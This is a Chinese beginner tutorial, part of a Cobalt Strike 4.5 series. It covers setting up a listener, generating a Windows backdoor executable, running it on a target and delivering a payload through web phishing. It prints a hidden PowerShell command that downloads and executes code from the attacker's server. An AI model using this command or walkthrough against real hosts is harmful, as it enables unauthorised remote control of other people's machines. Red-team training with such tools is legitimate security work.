小白学习Cobalt Strike4.5(二)

简介: 小白学习Cobalt Strike4.5(二)

一、添加监听器

1、点击菜单栏下面那个耳机的图标,出现监听器选项卡,然后点击添加


2、修改关键参数,填写服务端的ip地址192.168.0.108,HTTP上线端口可以是任意端口,这里改为8888,然后点击保存

3、自动将监听器添加到下面的选项卡里

二、生成后门

1、点击攻击,选择生成后门,再选择Windows可执行程序(E)

2、点击选择按钮,添加上一步生成的名为ayou的监听器,点击选择,然后回到对话框,再点击生成。

三、获取目标主机

将生成的exe文件,在目标主机上运行,获取目标主机信息

四、web钓鱼

1、点击攻击,选择web钓鱼(W),选择web投递(Stageless)

2、选择上一步生成的名为aiyou的监听器,然后点击运行


3、会程程一条命令,让目标主机通过powershell执行该命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.108:80/a'))"


4、主机成功上线

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

相关文章
|
7月前
|
安全 Linux 数据安全/隐私保护
小白学习Cobalt Strike4.5(一)
小白学习Cobalt Strike4.5(一)
187 0
|
7月前
|
Ubuntu Java Shell
Cobalt Strike配置
Cobalt Strike配置
169 0
小白学习Cobalt Strike4.5(四)2
小白学习Cobalt Strike4.5(四)2
105 0
|
安全
小白学习Cobalt Strike4.5(四)1
小白学习Cobalt Strike4.5(四)1
112 0
|
Windows
小白学习Cobalt Strike4.5(五)2
小白学习Cobalt Strike4.5(五)2
|
Java C# C语言
小白学习Cobalt Strike4.5(五)1
小白学习Cobalt Strike4.5(五)1
230 0
|
编译器 C语言 C++
聊聊Cobalt Strike 4.1的 BOF
聊聊Cobalt Strike 4.1的 BOF
|
安全 数据安全/隐私保护
Crack Slide | X 科网站的登录滑块逆向分析(读者投稿)
Crack Slide | X 科网站的登录滑块逆向分析(读者投稿)
225 0
Crack Slide | X 科网站的登录滑块逆向分析(读者投稿)
|
存储 数据安全/隐私保护 Windows
U启动盘(NETBASE第十二课)
U启动盘(NETBASE第十二课)
151 0
|
网络协议 安全 Java
工具 | Cobalt Strike基本使用
工具 | Cobalt Strike基本使用
521 0